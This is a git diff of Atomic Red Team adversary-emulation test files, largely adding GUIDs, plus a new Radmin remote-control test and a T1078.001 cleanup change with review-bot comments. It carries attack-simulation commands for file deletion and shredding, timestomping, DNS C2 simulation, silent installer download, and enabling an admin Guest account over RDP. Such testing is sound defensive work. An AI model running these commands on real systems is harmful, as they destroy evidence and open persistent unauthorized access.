diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md
index 9552d0c2..f5bd9b21 100644
--- a/atomics/T1070.004/T1070.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -35,10 +35,14 @@ Delete a single file from the temporary directory
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
@@ -64,10 +68,14 @@ Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
@@ -93,10 +101,14 @@ Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** Linux
+**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
@@ -123,10 +135,14 @@ Upon execution, no output will be displayed. Use File Explorer to verify the fil
**Supported Platforms:** Windows
+**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004|
@@ -145,7 +161,7 @@ del /f #{file_to_delete}
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```cmd
-IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -165,10 +181,14 @@ Upon execution, no output will be displayed. Use File Explorer to verify the fol
**Supported Platforms:** Windows
+**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1551.004|
@@ -187,7 +207,7 @@ rmdir /s /q #{folder_to_delete}
##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```cmd
-IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -206,10 +226,14 @@ Delete a single file from the temporary directory using Powershell. Upon executi
**Supported Platforms:** Windows
+**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1551.004|
@@ -228,7 +252,7 @@ Remove-Item -path #{file_to_delete}
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
+if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -247,10 +271,14 @@ Recursively delete a folder in the temporary directory using Powershell. Upon ex
**Supported Platforms:** Windows
+**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1551.004|
@@ -269,7 +297,7 @@ Remove-Item -Path #{folder_to_delete} -Recurse
##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
+if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -288,6 +316,10 @@ This test deletes the entire root filesystem of a Linux system. This technique w
**Supported Platforms:** Linux
+**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52
+
+
+
@@ -313,6 +345,10 @@ before and after the test to verify that the number of prefetch files decreases
**Supported Platforms:** Windows
+**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb
+
+
+
@@ -341,10 +377,14 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20
**Supported Platforms:** Windows
+**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log|
@@ -363,7 +403,7 @@ Remove-Item #{teamviewer_log_file}
##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
+if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md
index ca630c36..c27abeb0 100644
--- a/atomics/T1070.005/T1070.005.md
+++ b/atomics/T1070.005/T1070.005.md
@@ -19,10 +19,14 @@ Add a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
+**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Share to add. | string | \\test\share|
@@ -49,10 +53,14 @@ Removes a Network Share utilizing the command_prompt
**Supported Platforms:** Windows
+**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
@@ -78,10 +86,14 @@ Removes a Network Share utilizing PowerShell
**Supported Platforms:** Windows
+**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md
index 224f3a98..752ef9b0 100644
--- a/atomics/T1070.006/T1070.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -31,10 +31,14 @@ Stomps on the access timestamp of a file
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
@@ -60,10 +64,14 @@ Stomps on the modification timestamp of a file
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
@@ -92,10 +100,14 @@ Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
@@ -127,10 +139,14 @@ This technique was used by the threat actor Rocke during the compromise of Linux
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
@@ -158,10 +174,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
**Supported Platforms:** Windows
+**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
| file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1551.006_timestomp.txt|
@@ -185,7 +205,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
##### Description: A file must exist at the path (#{file_path}) to change the creation time on
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1}
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -206,10 +226,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
**Supported Platforms:** Windows
+**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
| file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1551.006_timestomp.txt|
@@ -233,7 +257,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
##### Description: A file must exist at the path (#{file_path}) to change the modified time on
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1}
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -254,10 +278,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
**Supported Platforms:** Windows
+**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
| file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1551.006_timestomp.txt|
@@ -281,7 +309,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
##### Description: A file must exist at the path (#{file_path}) to change the last access time on
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1}
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -305,10 +333,14 @@ Successful execution will include the placement of kxwn.lock in #{file_path} and
**Supported Platforms:** Windows
+**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | File path for timestomp payload | String | $env:appdata\Microsoft|
@@ -333,7 +365,7 @@ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
##### Description: timestomp.ps1 must be present in #{file_path}.
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
+if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -342,7 +374,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal
##### Description: kxwn.lock must be present in #{file_path}.
##### Check Prereq Commands:
```powershell
-if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
+if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index 92588a46..d91dd8db 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -18,6 +18,10 @@ will be displayed. More information about fsutil can be found at https://docs.mi
**Supported Platforms:** Windows
+**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435
+
+
+
diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md
index f1ba954c..8722d0bc 100644
--- a/atomics/T1071.001/T1071.001.md
+++ b/atomics/T1071.001/T1071.001.md
@@ -24,10 +24,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
+**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
@@ -59,10 +63,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
+**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
| curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe|
@@ -85,7 +93,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
##### Description: Curl must be installed on system
##### Check Prereq Commands:
```powershell
-if (Test-Path #{curl_path}) {exit 0} else {exit 1}
+if (Test-Path #{curl_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -109,10 +117,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md
index 22de47a9..d637d611 100644
--- a/atomics/T1071.004/T1071.004.md
+++ b/atomics/T1071.004/T1071.004.md
@@ -25,10 +25,14 @@ A custom domain and sub-domain will need to be passed as input parameters for th
**Supported Platforms:** Windows
+**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| query_type | DNS query type | string | TXT|
| subdomain | Subdomain prepended to the domain name | string | atomicredteam|
@@ -59,10 +63,14 @@ A custom domain and sub-domain will need to be passed as input parameters for th
**Supported Platforms:** Windows
+**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| runtime | Time in minutes to run the simulation | integer | 30|
| domain | Default domain to simulate against | string | 127.0.0.1.xip.io|
@@ -96,10 +104,14 @@ The simulation involves sending DNS queries that gradually increase in length un
**Supported Platforms:** Windows
+**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| query_type | DNS query type | string | TXT|
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
@@ -133,10 +145,14 @@ https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
+**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com|
| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1|
diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md
new file mode 100644
index 00000000..e4d9008d
--- /dev/null
+++ b/atomics/T1072/T1072.md
@@ -0,0 +1,61 @@
+# T1072 - Software Deployment Tools
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1072)
+Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
+
+Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
+
+The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Radmin Viewer Utility](#atomic-test-1---radmin-viewer-utility)
+
+
+
+
+## Atomic Test #1 - Radmin Viewer Utility
+An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| radmin_installer | Radmin Viewer installer | Path | %TEMP%\RadminViewer.msi|
+| radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+"#{radmin_exe}"
+```
+
+
+
+
+#### Dependencies: Run with `command_prompt`!
+##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+##### Check Prereq Commands:
+```cmd
+if not exist "#{radmin_exe}" (exit /b 1)
+```
+##### Get Prereq Commands:
+```cmd
+echo Downloading radmin installer
+bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+msiexec /i "#{radmin_installer}" /qn
+```
+
+
+
+
+
diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml
new file mode 100644
index 00000000..cecdcede
--- /dev/null
+++ b/atomics/T1072/T1072.yaml
@@ -0,0 +1,34 @@
+attack_technique: T1072
+display_name: Software Deployment Tools
+atomic_tests:
+- name: Radmin Viewer Utility
+ auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+ description: |
+ An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
+ supported_platforms:
+ - windows
+ input_arguments:
+ radmin_installer:
+ description: Radmin Viewer installer
+ type: Path
+ default: '%TEMP%\RadminViewer.msi'
+ radmin_exe:
+ description: The radmin.exe executable from RadminViewer.msi
+ type: Path
+ default: '%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe'
+
+ dependencies:
+ - description: |
+ Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+ prereq_command: |
+ if not exist "#{radmin_exe}" (exit /b 1)
+ get_prereq_command: |
+ echo Downloading radmin installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+ msiexec /i "#{radmin_installer}" /qn
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ "#{radmin_exe}"
\ No newline at end of file
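Review bot: The get_prereq_command downloads `Radmin_Viewer_3.5.2.1_EN.msi` with bitsadmin and hands it straight to `msiexec /i ... /qn` under an elevated executor, with no integrity check on the fetched installer, so a tampered or substituted download is installed silently as SYSTEM-level software on the test host. A hash pin between the two lines would bound that, e.g. `certutil -hashfile "#{radmin_installer}" SHA256 | findstr /i "<EXPECTED_SHA256_PLACEHOLDER>" >nul || exit /b 1` (the placeholder is the vendor-published digest, not a value on this page). The `radmin_exe` default mixes `%PROGRAMFILES(x86)%/.../Radmin.exe` forward slashes with a Windows path; `if exist` appears to tolerate it, but the other defaults in this file use backslashes and it is worth making consistent. The file also ends without a trailing newline.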
diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md
index 87f04803..18147371 100644
--- a/atomics/T1074.001/T1074.001.md
+++ b/atomics/T1074.001/T1074.001.md
@@ -20,10 +20,14 @@ verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
+**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat|
@@ -53,10 +57,14 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074.001_discovery.log|
@@ -83,10 +91,14 @@ was placed in the temp directory.
**Supported Platforms:** Windows
+**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip|
| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip|
diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md
index c2c4a3b6..3d3aef89 100644
--- a/atomics/T1078.001/T1078.001.md
+++ b/atomics/T1078.001/T1078.001.md
@@ -12,18 +12,24 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
-After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
+After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+and desktop will allow multiple RDP connections.
**Supported Platforms:** Windows
+**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| guest_user | Specify the guest account | String | guest|
| guest_password | Specify the guest password | String | Password123!|
+| remove_rdp_access_during_cleanup | Set to 1 if you want the cleanup to remove RDP access to machine | Integer | 0|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -43,8 +49,9 @@ reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConne
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
```
diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
index 3bc650f3..fef6894e 100644
--- a/atomics/T1078.001/T1078.001.yaml
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -3,7 +3,9 @@ display_name: 'Valid Accounts: Default Accounts'
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -15,6 +17,10 @@ atomic_tests:
description: Specify the guest password
type: String
default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -27,7 +33,8 @@ atomic_tests:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
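Review bot: With the new default `remove_rdp_access_during_cleanup: 0`, the cleanup no longer reverts the `fDenyTSConnections` / `AllowTSConnections` values that the executor sets (the `reg add` is visible only in the generated T1078.001.md hunk context above), so a default run leaves RDP enabled on the host after cleanup reports success. That is a deliberate behaviour change and should be stated in the argument's description rather than only in the echo text, e.g. `description: Set to 1 to have the cleanup revert the Terminal Server registry changes (re-disabling RDP); the default 0 leaves RDP enabled after the test`. The echo note says "disable RDP access" while the description says "remove RDP access"; one phrasing would avoid confusion for the operator reading the cleanup output. If the argument is ever passed empty, `if  NEQ 1` is presumably a cmd syntax error and the cleanup would abort before the guarded reg delete lines — worth confirming against the executor. The same lines appear in the generated T1078.001.md hunk.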
diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md
index 36d3713c..5bc00429 100644
--- a/atomics/T1078.003/T1078.003.md
+++ b/atomics/T1078.003/T1078.003.md
@@ -17,6 +17,10 @@ After execution the new account will be active and added to the Administrators g
**Supported Platforms:** Windows
+**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15
+
+
+
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index 9a0e9550..d83db839 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -39,6 +39,10 @@ Identify System Info. Upon execution, system info and time info will be displaye
**Supported Platforms:** Windows
+**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667
+
+
+
@@ -64,6 +68,10 @@ Identify System Info
**Supported Platforms:** macOS
+**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6
+
+
+
@@ -89,10 +97,14 @@ Identify System Info
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file used to store the results. | path | /tmp/T1082.txt|
@@ -127,6 +139,10 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
+**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec
+
+
+
@@ -158,6 +174,10 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
+**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e
+
+
+
@@ -186,6 +206,10 @@ Identify system hostname for Windows. Upon execution, the hostname of the device
**Supported Platforms:** Windows
+**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f
+
+
+
@@ -210,6 +234,10 @@ Identify system hostname for Linux and macOS systems.
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
+
+
+
@@ -234,6 +262,10 @@ Identify the Windows MachineGUID value for a system. Upon execution, the machine
**Supported Platforms:** Windows
+**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8
+
+
+
@@ -261,12 +293,16 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta
**Supported Platforms:** Windows
+**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| vbscript | Path to sample script | String | PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs|
+| vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs|
#### Attack Commands: Run with `powershell`!
@@ -290,6 +326,10 @@ Identify all environment variables. Upon execution, environments variables and y
**Supported Platforms:** Windows
+**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
+
+
+
@@ -314,6 +354,10 @@ Identify all environment variables. Upon execution, environments variables and y
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
+
+
+
